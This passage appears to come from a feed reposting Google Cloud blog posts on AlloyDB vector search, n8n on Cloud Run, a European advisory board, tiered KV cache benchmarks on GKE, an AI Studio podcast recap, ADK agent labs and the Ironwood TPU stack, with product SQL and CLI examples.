You want to build a gen AI search feature to improve the quality of search in your application and make it more dynamic and personalized for users. You want to evolve from solely supporting simple lexical searches such as “jacket”, which perform exact matches, to searches such as “warm coat for winter” that can find semantically similar items like jackets, coats or vests. To refine the quality, you also want to combine this semantic matching with structured filters such as color = 'maroon' or price < 100. Some of these filters may even live in a different table, such as an orders table which stores information about the user’s order history.

From operational to AI-native

Before you can get started on application logic, you need to generate embeddings on your data so you can perform a vector search. For this you would typically need to:

Build an ETL pipeline to extract products data from AlloyDB
Write custom code to batch the data and send it to an embedding model API on Vertex AI
Carefully manage rate limits, token limits, and failures
Write the resulting vectors back into your database
Build another process to watch for UPDATE commands so you can do it again and again, just to keep your data fresh
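For a sense of what that manual pipeline involves, here is a minimal sketch of the batching and retry logic alone. The embedding call is a hypothetical stand-in (`fake_embed`) rather than the Vertex AI client, and the batch size and backoff values are illustrative assumptions.

```python
import time

class RateLimitError(Exception):
    """Raised by the (hypothetical) embedding client when throttled."""

def batched(items, batch_size):
    # Yield consecutive slices of at most batch_size items.
    for start in range(0, len(items), batch_size):
        yield items[start:start + batch_size]

def embed_with_retry(embed_fn, texts, max_attempts=3, base_delay=0.01):
    # Retry a throttled batch with exponential backoff.
    for attempt in range(max_attempts):
        try:
            return embed_fn(texts)
        except RateLimitError:
            if attempt == max_attempts - 1:
                raise
            time.sleep(base_delay * 2 ** attempt)

def embed_table(rows, embed_fn, batch_size=2):
    # rows: list of (product_id, product_description) tuples.
    embeddings = {}
    for batch in batched(rows, batch_size):
        vectors = embed_with_retry(embed_fn, [text for _, text in batch])
        for (product_id, _), vector in zip(batch, vectors):
            embeddings[product_id] = vector
    return embeddings

# Stand-in model: fails once to exercise the retry path, then returns
# a toy 2-dimensional "embedding" per text.
calls = {"count": 0}

def fake_embed(texts):
    calls["count"] += 1
    if calls["count"] == 1:
        raise RateLimitError("throttled")
    return [[float(len(t)), float(t.count(" "))] for t in texts]

rows = [(1, "warm wool coat"), (2, "rain jacket"), (3, "down vest")]
result = embed_table(rows, fake_embed)
```

Even this sketch leaves out token limits, writing vectors back to the table, and tracking later updates, all of which a production pipeline would also have to handle.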

AlloyDB AI’s new feature, auto vector embeddings, eliminates this entire workflow.

It provides a fully managed, scalable solution to create and maintain embeddings directly from the database. The system batches API calls to Vertex AI, maximizing throughput, and can operate as a background process to ensure that your critical transactions aren’t blocked.

To generate vector embeddings from your product_description column, you just run one SQL command:

    CALL ai.initialize_embeddings(
      model_id => 'gemini-embedding-001',
      table_name => 'products',
      content_column => 'product_description',
      embedding_column => 'product_embedding',
      incremental_refresh_mode => 'transactional' -- Automatically updates on data changes
    );

Now AlloyDB can handle embedding generation for you. Your products table is AI-enabled and embeddings are automatically updated as your data changes.

If you prefer to manually refresh embeddings, you can run the following SQL command:

    CALL ai.refresh_embeddings(
      table_name => 'products',
      embedding_column => 'product_embedding', -- embedding vector column
      batch_size => 50 -- optional override
    );

Turbocharging search with AlloyDB AI

Now that you have embeddings, you face the second hurdle: performance and quality of search. Say a user searches for “warm coat for winter.” Your query may look like this:

    SELECT * FROM products
    WHERE color = 'maroon'
    ORDER BY product_embedding <-> google_ml.embedding('gemini-embedding-001', 'warm coat for winter')
    LIMIT 10;
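Conceptually, this query filters rows and then orders the survivors by vector distance. The sketch below reproduces that logic in plain Python without an index, assuming the pgvector convention that `<->` is Euclidean (L2) distance. The product rows and three-dimensional vectors are made up for illustration.

```python
import math

def l2_distance(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def filtered_search(rows, query_vector, color, limit):
    # Equivalent of: WHERE color = ... ORDER BY embedding <-> query LIMIT n
    candidates = [r for r in rows if r["color"] == color]
    candidates.sort(key=lambda r: l2_distance(r["embedding"], query_vector))
    return candidates[:limit]

products = [
    {"product_id": 1, "color": "maroon", "embedding": [0.9, 0.1, 0.0]},
    {"product_id": 2, "color": "navy", "embedding": [0.9, 0.1, 0.0]},
    {"product_id": 3, "color": "maroon", "embedding": [0.1, 0.9, 0.2]},
    {"product_id": 4, "color": "maroon", "embedding": [0.8, 0.2, 0.1]},
]

query = [1.0, 0.0, 0.0]  # stand-in for the embedded search text
top = filtered_search(products, query, color="maroon", limit=2)
```

This brute-force version computes a distance for every row that passes the filter, which is workable for four products but not for a large catalog.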

To make this vector search query performant, you need a vector index. But traditional vector indexes require deep expertise: you have to manually configure parameters, rebuild the index periodically as data changes, and hope your tuning is correct. This slows development and adds operational overhead.

    -- Optimal `num_leaves` and `max_num_levels` are based on number of vectors in the
    -- products table, which means the user will have to figure that out beforehand to
    -- properly tune the index.

    CREATE INDEX idx_products_embedding ON products
    USING scann (product_embedding)
    WITH (num_leaves=100000, max_num_levels=2);

The new auto vector index feature abstracts all this away and delivers a fully automated and integrated vector search experience that is self-configuring, self-maintaining, and self-tuning. To create a fully optimized index, you just run:

    -- AlloyDB will automatically figure out index configuration underneath the hood.
    CREATE INDEX idx_products_embedding ON products
    USING scann (product_embedding)
    WITH (mode = 'AUTO');

With mode = 'AUTO', AlloyDB handles everything:

Automatic configuration: It analyzes your data and automatically configures the index parameters at creation time to meet your performance and quality goals.
Automatic maintenance: The index updates incrementally and automatically as your data changes, ensuring it remains optimized without any manual intervention. It automatically splits as the index grows in size and automatically updates centroids when data distribution drifts.
Automatic query plan optimization: This is where the real magic happens. The ScaNN index leverages real-time workload statistics to self-tune and optimize the execution plan. For a deeper dive, read our previous blog, A deep dive into AlloyDB’s vector search enhancements.

Two new ways to become AI-native

With AlloyDB’s new capabilities, making your operational workload AI-native no longer requires complex ETL pipelines and infrastructure code.

Auto vector embeddings transforms your data by handling the entire embedding generation and management lifecycle inside the database.
Auto vector index simplifies retrieval by providing a self-tuning, self-maintaining index that automatically optimizes complex filtered vector searches.

By removing this complexity, AlloyDB empowers you to use your existing SQL skills to build and scale world-class AI experiences with speed and confidence, moving projects from proof-of-concept to production faster than ever before. Get started with auto vector embeddings and the auto vector index today.

To get started, try our 30-day AlloyDB free trial. New Google Cloud customers also get $300 in free credits.

2025 11 07

GCP – Easy AI workflow automation: Deploy n8n on Cloud Run

Tibor Kiss Cloud, Google Cloud gcp

n8n is a powerful yet easy-to-use workflow and automation tool for multi-step AI agents, and many teams want a simple, scalable, and cost-effective way to self-host it. With just a few commands, you can deploy n8n to Cloud Run and have it up and running, ready to supercharge your business with AI workflows that can manage spreadsheets, read and draft emails, and more. The n8n docs now tell you how to deploy the official n8n Docker image to our serverless platform, connect it to Cloud SQL for persistent data storage, call Gemini as the agents’ LLM, and (optionally) connect your workflows directly to Google Workspace.

Deploy n8n to Cloud Run in minutes

You can deploy the official n8n image directly to Cloud Run. This gives you a managed, serverless environment that automatically scales from zero to handle any workload, so you only pay for what you use. That means whenever you’re not actively using n8n, you’re not paying for any compute and your n8n data is persisted in Cloud SQL.

To first try out n8n quickly on Cloud Run, deploy it with this one command:

    gcloud run deploy --image=n8nio/n8n \
      --allow-unauthenticated \
      --port=5678 \
      --no-cpu-throttling \
      --memory=2Gi

This gives you a running instance of n8n that you can use to try out n8n and all its awesome features for workflow automation with the power of AI. Connect your first n8n agent to Gemini (provide your Gemini API key for the “Google Gemini Chat Model” credentials) and see it in action.

Then, when you’re ready to use n8n for actual workflows, you can follow the steps in the n8n docs for a more durable, secure setup (using Cloud SQL, Secret Manager, etc.). You can either use a Terraform script or follow along step-by-step through each gcloud command in the instructions.

Connect Google Workspace tools

A key benefit of hosting on Google Cloud is the ability to easily connect n8n to your Google Workspace tools. The n8n docs walk you through the steps to configure OAuth for Google Cloud, allowing your n8n workflows to securely access and automate tasks using Google tools like Gmail, Google Calendar, and Google Drive.

Here’s a demo showing an n8n instance on Cloud Run that uses Gmail and Google Calendar to schedule appointments on your behalf whenever an email hits your inbox with a request to meet:

The two AI agents in this n8n workflow call Gemini to do the following:

The Text Classifier reads your incoming emails to see which ones are asking for time to meet
The Agent checks your calendar for your availability, and sends a response with a suggested time
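The two-step flow can be sketched in plain Python. This is not n8n or Gemini code: a keyword check stands in for the Text Classifier's LLM call, and the calendar is a hypothetical list of busy intervals.

```python
from datetime import datetime, timedelta

MEETING_HINTS = ("meet", "call", "schedule", "catch up")

def is_meeting_request(email_body):
    # Stand-in for the LLM-based Text Classifier.
    body = email_body.lower()
    return any(hint in body for hint in MEETING_HINTS)

def first_free_slot(busy, day_start, day_end, duration):
    # busy: list of (start, end) datetimes. Walk the gaps in time order.
    cursor = day_start
    for start, end in sorted(busy):
        if start - cursor >= duration:
            return cursor
        cursor = max(cursor, end)
    return cursor if day_end - cursor >= duration else None

def handle_email(email_body, busy, day_start, day_end):
    if not is_meeting_request(email_body):
        return None  # not a meeting request, nothing to schedule
    slot = first_free_slot(busy, day_start, day_end, timedelta(minutes=30))
    if slot is None:
        return "No availability that day."
    return f"How about {slot:%Y-%m-%d %H:%M}?"

day = datetime(2025, 11, 10)
busy = [
    (day.replace(hour=9), day.replace(hour=10)),
    (day.replace(hour=10), day.replace(hour=11, minute=45)),
]
reply = handle_email(
    "Could we meet next week to discuss the proposal?",
    busy, day.replace(hour=9), day.replace(hour=17),
)
```

In the real workflow both steps are delegated to Gemini, which can cope with phrasing that a keyword list would miss.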

Cloud Run is great for all AI apps

Cloud Run is a versatile, easy-to-use runtime for all your AI application needs. Whether your agentic app was made with n8n, LangChain, ADK, or no framework at all, you can deploy it to Cloud Run. This collaboration on Cloud Run and n8n is another example of how we aim to simplify the process for developers to build and deploy intelligent applications.

Next steps

Read more about Cloud Run (or just try it out in the web console!)
Explore n8n

2025 11 07

GCP – Google Cloud Europe establishes new European Advisory Board

Tibor Kiss Cloud, Google Cloud gcp

Across the world, organizations are partnering with Google Cloud to tackle their toughest challenges, drive digital transformation, and unlock new levels of growth. In Europe, organizations face unique and complex regulatory challenges. To ensure we’re delivering the best possible value and experience for our customers here, we have established a new European Advisory Board. This distinguished group of leaders from across various industries will act as a vital feedback channel, help customers navigate complex regulatory landscapes, and foster a strong, sustainable digital economy. Their counsel is key to ensuring Google Cloud products not only meet but exceed European requirements, driving our regional expertise and differentiation and ultimately supporting Europe’s digital transformation.

The board comprises renowned leaders with deep expertise spanning technology, finance, retail, and public service.

The new board members are:

Jim Snabe (Chair): A global business leader and current Chairman of Siemens AG. With a long career at the intersection of technology and innovation, including his time as Co-CEO of SAP AG, Jim brings deep expertise in guiding multinational organizations through digital transformation and growth. His leadership will be pivotal in steering the board’s strategic direction.
Stefan F Heidenreich: A business leader with extensive experience in the consumer goods industry, including as Chairman of the Management Board and CEO of Beiersdorf AG. His knowledge of brand management, market strategy, and organizational leadership will provide valuable commercial insights.
Nigel Hinshelwood: An expert in financial services with significant leadership roles at institutions like HSBC and Lloyds Banking Group. His understanding of Europe’s financial sector and regulatory environment will be crucial for guiding Google Cloud’s work with major banking and financial services clients.
Christophe Cuvillier: A prominent French businessman and former CEO of Unibail-Rodamco-Westfield. With a background in luxury, retail, and real estate, Christophe’s perspective on customer-centricity and business transformation in the consumer sector will be a key asset to the board.
Tim Radford (from Jan 2026): A former British military leader and operational commander with a background in defense and large-scale project delivery. His insights into leveraging technology to achieve strategic business objectives will be vital to the board’s discussions.

“It is a privilege to chair Google Cloud’s EMEA advisory board,” said Jim Snabe. “Europe is at a critical juncture in its digital evolution. This board’s mission is to provide counsel that helps Google Cloud not only accelerate innovation but also ensure it is done in a way that aligns with Europe’s values and priorities, fostering a secure and inclusive digital future.”

The formation of this board underscores Google Cloud’s ongoing commitment to a European-first strategy, collaborating closely with local leaders to build technology solutions that are tailored to the continent’s unique needs and opportunities. The board will meet periodically to advise Google Cloud leadership on a range of strategic issues, from product development and market entry to policy and sustainability initiatives.

2025 11 07

GCP – Boosting LLM Performance with Tiered KV Cache on Google Kubernetes Engine

Tibor Kiss Cloud, Google Cloud gcp

Large Language Models (LLMs) are powerful, but their performance can be bottlenecked by the immense NVIDIA GPU memory footprint of the Key-Value (KV) Cache. This cache, crucial for speeding up LLM inference by storing Key (K) and Value (V) matrices, directly impacts context length, concurrency, and overall system throughput. Our primary goal is to maximize the KV Cache hit ratio by intelligently expanding NVIDIA GPU High Bandwidth Memory (HBM) with a tiered node-local storage solution.

Our collaboration with the LMCache team (Kuntai Du, Jiayi Yao, and Yihua Cheng from Tensormesh) has led to the development of an innovative solution on Google Kubernetes Engine (GKE).

Tiered Storage: Expanding the KV Cache Beyond HBM

LMCache extends the KV Cache from the NVIDIA GPU’s fast HBM (Tier 1) to larger, more cost-effective tiers like CPU RAM and local SSDs. This dramatically increases the total cache size, leading to a higher hit ratio and improved inference performance by keeping more data locally on the accelerator node. For GKE users, this means accommodating models with massive context windows while maintaining excellent performance.
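The tiering idea can be illustrated with a toy cache. This sketch is not LMCache's implementation: it assumes simple LRU eviction, promotes an entry to the fastest tier on a hit, and demotes the least recently used entry to the next tier when a tier overflows. Tier names and capacities are illustrative.

```python
from collections import OrderedDict

class TieredCache:
    def __init__(self, capacities):
        # capacities: list of (tier_name, max_entries), fastest tier first.
        self.names = [name for name, _ in capacities]
        self.limits = [limit for _, limit in capacities]
        self.tiers = [OrderedDict() for _ in capacities]
        self.hits = 0
        self.misses = 0

    def _insert(self, level, key, value):
        tier = self.tiers[level]
        tier[key] = value
        tier.move_to_end(key)
        if len(tier) > self.limits[level]:
            old_key, old_value = tier.popitem(last=False)  # evict LRU entry
            if level + 1 < len(self.tiers):
                self._insert(level + 1, old_key, old_value)  # demote
            # Otherwise the entry falls out of the slowest tier.

    def get(self, key):
        for tier in self.tiers:
            if key in tier:
                value = tier.pop(key)
                self.hits += 1
                self._insert(0, key, value)  # promote to the fastest tier
                return value
        self.misses += 1
        return None

    def put(self, key, value):
        for tier in self.tiers:
            tier.pop(key, None)
        self._insert(0, key, value)

    def hit_ratio(self):
        total = self.hits + self.misses
        return self.hits / total if total else 0.0


def replay(cache, prefixes, rounds=3):
    # Cycle through shared prefixes; on a miss, "compute" and cache the entry.
    for _ in range(rounds):
        for prefix in prefixes:
            if cache.get(prefix) is None:
                cache.put(prefix, f"kv-for-{prefix}")
    return cache.hit_ratio()

prefixes = [f"prompt-{i}" for i in range(6)]
hbm_only = replay(TieredCache([("HBM", 2)]), prefixes)
tiered = replay(TieredCache([("HBM", 2), ("CPU RAM", 2), ("Local SSD", 4)]), prefixes)
```

In this replay, six prefixes cycle through a two-entry HBM tier. With HBM alone every lookup misses, while the tiered configuration serves every repeated prefix from one of its tiers.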

Performance Benchmarking and Results

We designed tests to measure the performance of this tiered KV Cache by configuring workloads to fill each storage layer (HBM, CPU RAM, Local SSD). We benchmarked these configurations using various context lengths (1k, 5k, 10k, 50k, and 100k tokens), representing diverse use cases such as:

1k – 5k tokens: High-fidelity personas and complex instructions
10k tokens: Average user prompts (small RAG) or web page/article content
50k tokens: Prompt stuffing
100k tokens: Content equivalent to a long book

Our primary performance indicators were Time to First Token (TTFT), token input throughput, and end-to-end latency. The results highlight the best-performing storage setup for each KV Cache size and the performance improvements achieved.

Experiment Setup

We deployed a vLLM server on an A3 mega machine, leveraging local SSD for ephemeral storage via emptyDir.

Hardware: 8 × nvidia-h100-mega-80gb NVIDIA GPUs
Model: Llama-3.3-70B-Instruct
LMCache version: v0.3.3
Cache Configuration:

HBM only
HBM + CPU RAM
HBM + CPU RAM + Local SSD

Storage Resources: HBM: 640Gi, CPU RAM: 1Ti, Local SSD: 5Ti

Benchmark Tool: SGLang bench_serving

Requests: Tests were conducted with system prompt lengths of 1k, 5k, 10k, 50k, and 100k tokens. Each system prompt provided a shared context for a batch of 20 inference requests, with individual requests consisting of a unique 256-token input and generating a 512-token output.

Example Command:

    python3 sglang/bench_serving.py --host=${IP} --port=${PORT} --dataset-name='generated-shared-prefix' --model=$MODEL --tokenizer=$MODEL --backend=vllm --gsp-num-groups=80 --gsp-

Benchmark Results

Our tests explored different total KV Cache sizes. The following results highlight the optimal storage setup for each size and the performance improvements achieved:

Test 1: Cache (1.1M – 1.3M tokens) fits entirely within HBM

Results: In this scenario, adding slower storage tiers provided no advantage, making an HBM-only configuration the optimal setup.

Test 2: Cache (4.0M – 4.3M tokens) exceeds HBM capacity but fits within HBM + CPU RAM

System Prompt Length	Best-performing Storage Setup	Mean TTFT (ms) Change (%) vs. HBM only	Input Throughput Change (%) vs. HBM only	Mean End-to-End Latency Change (%) vs. HBM only
1000	HBM	0%	0%	0%
5000	HBM + CPU RAM	-18%	+16%	-14%
10000	HBM + CPU RAM	-44%	+50%	-33%
50000	HBM + CPU RAM + Local SSD	-68%	+179%	-64%
100000	HBM + CPU RAM + Local SSD	-79%	+264%	-73%

Test 3: Large cache (12.6M – 13.7M tokens) saturates HBM and CPU RAM, spilling to Local SSD

System Prompt Length	Best-performing Storage Setup	Mean TTFT (ms) Change (%) vs. HBM only	Input Throughput Change (%) vs. HBM only	Mean End-to-End Latency Change (%) vs. HBM only
1000	HBM + CPU RAM	+5%	+1%	-1%
5000	HBM + CPU RAM	-6%	+27%	-21%
10000	HBM + CPU RAM	+121%	+23%	-19%
50000	HBM + CPU RAM + Local SSD	+48%	+69%	-41%
100000	HBM + CPU RAM + Local SSD	-3%	+130%	-57%
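As a rough sanity check on these cache sizes, the KV Cache footprint per token can be estimated from the model architecture. The sketch assumes Llama-3.3-70B's published configuration (80 layers, 8 key-value heads under grouped-query attention, head dimension 128) and 2-byte (bf16/fp16) cache entries. The benchmark's actual cache dtype and any LMCache overhead are not stated here, so treat the outputs as estimates.

```python
GIB = 1024 ** 3

def kv_bytes_per_token(num_layers, num_kv_heads, head_dim, bytes_per_value):
    # One key vector and one value vector per layer and per KV head.
    return 2 * num_layers * num_kv_heads * head_dim * bytes_per_value

def kv_cache_gib(num_tokens, per_token_bytes):
    return num_tokens * per_token_bytes / GIB

# Assumed architecture values; see the caveats in the paragraph above.
per_token = kv_bytes_per_token(num_layers=80, num_kv_heads=8,
                               head_dim=128, bytes_per_value=2)

# Upper end of the token ranges reported for the three tests.
test_sizes = {
    "Test 1": 1_300_000,
    "Test 2": 4_300_000,
    "Test 3": 13_700_000,
}
estimates = {name: kv_cache_gib(tokens, per_token)
             for name, tokens in test_sizes.items()}

for name, gib in estimates.items():
    print(f"{name}: ~{gib:,.0f} GiB of KV Cache")
```

Under these assumptions each token costs 320 KiB, so the three tests land at roughly 0.4 TiB, 1.3 TiB, and 4.1 TiB. That is consistent with the tiers each test is described as filling, given 640Gi of HBM (shared with the model weights), 1Ti of CPU RAM, and 5Ti of Local SSD.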

Summary

These results clearly demonstrate that a tiered storage solution significantly improves LLM inference performance by leveraging node-local storage, especially in scenarios with long system prompts that generate large KV Caches.

Optimizing LLM inference is a complex challenge requiring the coordinated effort of multiple infrastructure components (storage, compute, networking). Our work is part of a broader initiative to enhance the entire end-to-end inference stack, from intelligent load balancing at the Inference Gateway to advanced caching logic within the model server.

We are actively exploring further enhancements by integrating additional remote storage solutions with LMCache.

Next Steps

Get started with the same setup mentioned above on GKE.
Keep up to date on the LLM-D Inference Stack.

2025 11 07

GCP – Agent Factory Recap: Build AI Apps in Minutes with Google’s Logan Kilpatrick

Tibor Kiss Cloud, Google Cloud gcp

In our latest episode of The Agent Factory, we were thrilled to welcome Logan Kilpatrick from Google DeepMind for a vibe coding session that showcased the tools shaping the future of AI development. Logan, who has had a front-row seat to the generative AI revolution at both OpenAI and now Google, gave us a hands-on tour of the vibe coding experience in Google AI Studio, showing just how fast you can go from an idea to a fully-functional AI application.

A podcast discussing vibe coding in Google AI Studio

This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.

The Build Experience in Google AI Studio – What is it?

This episode focused on the Build feature in Google AI Studio and Logan used the term vibe coding to describe the experience of using it. This feature is designed to radically accelerate how developers create AI-powered apps. The core idea is to move from a natural language prompt of an idea for an app to a live, running application in under a minute. It handles the scaffolding, code generation, and even error correction, allowing you to focus on iterating and refining your idea.

The Factory Floor

The Factory Floor is our segment for getting hands-on. Here, we moved from high-level concepts to practical code with live demos.

Vibe Coding a Virtual Food Photographer

Timestamp: [01:14]

To kick things off, Logan hit the “I’m Feeling Lucky” button to generate a random app idea: a virtual food photographer for restaurant owners. The goal was to build an app that could:

Accept a simple text-based menu.
Generate realistic, high-end photography for each dish.
Allow for style toggles like “rustic and dark” or “bright and modern.”

In about 90 seconds, we had a running web app. Logan fed it a quirky menu of pizza, blueberries, and popcorn, and the app generated images of each. We also saw how you can use AI-suggested features to iteratively adjust the prepared photos (like adding butter to the popcorn) and to add functionality (like changing the entire design aesthetic of the site).

Grounding with Google Maps

Timestamp: [10:25]

Next, Logan showcased one of the most exciting new features: grounding with Google Maps. This allows the Gemini models to connect directly to Google Maps to pull in rich, real-time place data without setting up a separate API. He demonstrated a starter template app that acted as a local guide, finding Italian restaurants in Chicago and describing the neighborhood.

Exploring the AI Studio Gallery

Timestamp: [14:55]

For developers looking for inspiration, Logan walked us through the AI Studio Gallery. This is a collection of pre-built, interactive examples that show what the models are capable of. Two highlights were:

Prompt DJ: An app that uses the Lyria model to generate novel, real-time music based on a prompt.
Vibe Check: A fun tool for visually testing and comparing how different models respond to the same prompt, which is becoming a popular way for developers to quickly evaluate a model’s suitability for their use case.

“Yap to App”: A Conversational Pair Programmer

Timestamp: [19:51]

For the final demo, Logan used a speech-to-text input to describe an app idea which he called “Yap to App”. His pitch: an AI pair programmer that could generate HTML code and then vocally coach him on how to improve it. After turning his spoken request into a written prompt, AI Studio built a voice-interactive app. The AI assistant generated a simple HTML card and then, when asked, provided verbal suggestions for improvement.

The Agent Industry Pulse

Timestamp: [26:19]

In this segment, we covered some of the biggest recent launches in the agent ecosystem:

Veo 3.1: Google’s new state-of-the-art video generation model that builds on Veo 3, adding richer native audio and the ability to define the first and last frames of a video to generate seamless transitions. Smitha showcased a quick applet, built entirely in AI Studio, where users can upload a selfie of themselves and generate a video of their future career in AI using Veo 3.1.
Anthropic’s Skills: A new feature that allows you to give Claude specific tools (like an Excel script) that it can decide to use on its own to complete a task. We compared this to Gemini Gems, noting the difference in approach between creating a persona (Gem) and providing a tool (Skill).
Recent Google Launches: Logan highlighted several other key releases, including the new Gemini computer use model for building agents that can navigate browsers, updates to the Flash and Flash-Lite models, and foundational upgrades to the AI Studio experience itself.

Logan Kilpatrick on the Future of AI Development

We also had the chance to discuss the bigger picture with Logan, from developer reactions to the future of models themselves.

Grounding with Google Maps

Timestamp: [31:26]

When asked which launch developers have been most excited about, Logan admitted he was surprised by the overwhelmingly positive reception for grounding with Google Maps. He noted that the Maps API is one of the most widely used developer APIs in the world, and making it incredibly simple to integrate with Gemini unlocked key use cases for countless developers and startups.

From Models to Systems: The Next Frontier

Timestamp: [32:26]

Looking ahead, Logan shared his excitement for the continued progress on code generation, which he sees as a fundamental accelerant for all other AI capabilities. He also pointed out a trend: models are evolving from simple tools into complex systems.

Historically, a model was something that took a token in and produced a token out. Now, models are starting to look more like agents out of the box. They can take actions: spinning up code sandboxes, pinging APIs, and navigating browsers. “Folks have thought about agents and models as these decoupled concepts,” Logan said, “and it feels like they’re coming closer and closer together as the model capabilities keep improving.”

Conclusion

This conversation was a powerful reminder of how quickly the barrier to entry for building sophisticated AI applications is falling. With tools like Google AI Studio, the ability to turn a creative spark into a working prototype is no longer a matter of weeks or days, but minutes. The focus is shifting from complex scaffolding to rapid, creative iteration.

Your turn to build

We hope this episode inspired you to get hands-on. Head over to Google AI Studio to try out vibe coding for yourself, and don’t forget to watch the full episode for all the details.

Connect with us

Logan → LinkedIn, X, BlueSky, blog
Mollie → LinkedIn, X, BlueSky
Smitha → LinkedIn, YouTube, X, Instagram

2025 11 07

GCP – Build Your First ADK Agent Workforce

Tibor Kiss Cloud, Google Cloud gcp

The world of Generative AI is evolving rapidly, and AI agents are at the forefront of this change. An AI agent is a software system designed to act on your behalf. It shows reasoning, planning, and memory, and has a level of autonomy to make decisions, learn, and adapt.

At its core, an AI agent uses a large language model (LLM), like Gemini, as its “brain” to understand and reason. This allows it to process information from various sources, create a plan, and execute a series of tasks to reach a predefined objective. This is the key difference between a simple prompt-and-response and an agent: the ability to act on a multi-step plan.

The great news is that you can now easily build your own AI agents, even without deep expertise, thanks to Agent Development Kit (ADK). ADK is an open-source Python and Java framework by Google designed to simplify agent creation.

To guide you, this post introduces three hands-on labs that cover the core patterns of agent development:

Building your first autonomous agent
Empowering that agent with tools to interact with external services
Orchestrating a multi-agent system where specialized agents collaborate

Build your first agent

This lab introduces the foundational principles of ADK by guiding you through the construction of a personal assistant agent.

You will write the code for the agent itself and will interact directly with the agent’s core reasoning engine, powered by Gemini, to see how it responds to a simple request. This lab is focused on building the fundamental scaffolding of every agent you’ll create.

Empower your agent with tools

An agent without custom tools can only rely on its built-in knowledge. To make it more powerful for your specific use-case, you can give it access to specialized tools. In this lab, you will learn three different ways to add tools:

Build a Custom Tool: Write a currency exchange tool from scratch.
Integrate a Built-in Tool: Add ADK’s pre-built Google Search tool.
Leverage a Third-Party Tool: Import and use a Wikipedia tool from the LangChain library.
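As a rough idea of what a from-scratch tool looks like, the sketch below defines a currency exchange function in plain Python. The rates are hard-coded, made-up values rather than live data, and the function name and return shape are assumptions, not the lab's code. ADK can wrap ordinary Python functions as tools, using the type hints and docstring to describe the tool to the model. The registration step is omitted here because it requires the ADK package.

```python
# Illustrative, static rates relative to USD. Not real market data.
RATES_PER_USD = {"USD": 1.0, "EUR": 0.5, "INR": 80.0}

def get_exchange_rate(currency_from: str, currency_to: str) -> dict:
    """Return the exchange rate between two ISO 4217 currency codes.

    Args:
        currency_from: Code of the currency to convert from, e.g. "USD".
        currency_to: Code of the currency to convert to, e.g. "INR".

    Returns:
        A dict with "status" and either "rate" or "error_message".
    """
    src = currency_from.upper()
    dst = currency_to.upper()
    if src not in RATES_PER_USD or dst not in RATES_PER_USD:
        return {"status": "error",
                "error_message": f"Unsupported currency pair: {src}/{dst}"}
    # Convert via USD: units of dst per one unit of src.
    rate = RATES_PER_USD[dst] / RATES_PER_USD[src]
    return {"status": "success", "rate": rate}

result = get_exchange_rate("eur", "inr")
```

Returning a structured dictionary with an explicit status gives the model something unambiguous to reason about when a lookup fails.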

Build a Team of Specialized Agents

When a task is too complex for a single agent, you can build out a multi-agent team. This lab goes deep into the power of multi-agent systems by having you build a “movie pitch development team” that can research, write, and analyze a film concept.

You will learn how to use ADK’s Workflow Agents to control the flow of work automatically, without needing user input at every step. You’ll also learn how to use the session state to pass information between the agents.
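The pattern of running agents in a fixed order while passing results through shared state can be sketched without ADK. In this plain-Python stand-in, each "agent" is just a function that reads from and writes to a `state` dictionary. The function names and state keys are hypothetical, and real agents would call an LLM instead of formatting strings.

```python
def researcher(state):
    state["research"] = f"Background notes on {state['topic']}"

def screenwriter(state):
    # Reads what the previous step stored under "research".
    state["plot_outline"] = f"Outline based on: {state['research']}"

def critic(state):
    state["review"] = f"Feedback on: {state['plot_outline']}"

def run_sequential(steps, state):
    # Run every step in order with no user input in between.
    for step in steps:
        step(state)
    return state

final_state = run_sequential(
    [researcher, screenwriter, critic],
    {"topic": "a heist on a space station"},
)
```

Because each step only depends on keys written by earlier steps, the order of the list is the whole workflow definition.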

Summary: Build Your First AI Teammate Today

Ready to build your first AI agents? Dive into the codelabs from this post:

Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!

2025 11 06

GCP – From silicon to softmax: Inside the Ironwood AI stack

Tibor Kiss Cloud, Google Cloud gcp

As machine learning models continue to scale, a specialized, co-designed hardware and software stack is no longer optional; it’s critical. Ironwood, our latest-generation Tensor Processing Unit (TPU), is the cutting-edge hardware behind advanced models like Gemini and Nano Banana, from massive-scale training to high-throughput, low-latency inference. This post details the core components of Google’s AI software stack that are woven into Ironwood, demonstrating how this deep co-design unlocks performance, efficiency, and scale. We cover the JAX and PyTorch ecosystems, the XLA compiler, and the high-level frameworks that make this power accessible.

1. The co-designed foundation

Foundation models today have trillions of parameters that require computation at ultra-large scale. We designed the Ironwood stack from the silicon up to meet this challenge.

The core philosophy behind the Ironwood stack is system-level co-design, treating the entire TPU pod not as a collection of discrete accelerators, but as a single, cohesive supercomputer. This architecture is built on a custom interconnect that enables massive-scale Remote Direct Memory Access (RDMA), allowing thousands of chips to exchange data directly at high bandwidth and low latency, bypassing the host CPU. Ironwood has a total of 1.77 PB of directly accessible HBM capacity, where each chip has eight stacks of HBM3E, with a peak HBM bandwidth of 7.4 TB/s and capacity of 192 GiB.
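As a rough sanity check, the aggregate HBM figure can be reproduced by multiplying the per-chip capacity by the number of chips in a superpod. The sketch below assumes the 9,216-chip superpod size given elsewhere in this post, and it treats the per-chip figure of 192 as decimal gigabytes, which is an assumption made here because that is what reproduces 1.77 PB.

```python
# Back-of-the-envelope check of the aggregate HBM capacity.
CHIPS_PER_SUPERPOD = 9_216  # superpod size stated elsewhere in this post
HBM_PER_CHIP_GB = 192       # per-chip capacity, treated as decimal GB (assumption)

total_gb = CHIPS_PER_SUPERPOD * HBM_PER_CHIP_GB
total_pb = total_gb / 1_000_000  # 1 PB = 1,000,000 GB in decimal units

print(f"{total_gb:,} GB is about {total_pb:.2f} PB")
```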

Unlike general-purpose parallel processors, TPUs are Application-Specific Integrated Circuits (ASICs) built for one purpose: accelerating large-scale AI workloads. The deep integration of compute, memory, and networking is the foundation of their performance. At a high level, the TPU consists of two parts:

Hardware core: The TPU core is centered around a dense Matrix Multiply Unit (MXU) for matrix operations, complemented by a powerful Vector Processing Unit (VPU) for element-wise operations (activations, normalizations) and SparseCores for scalable embedding lookups. This specialized hardware design is what delivers Ironwood’s 42.5 Exaflops of FP8 compute.

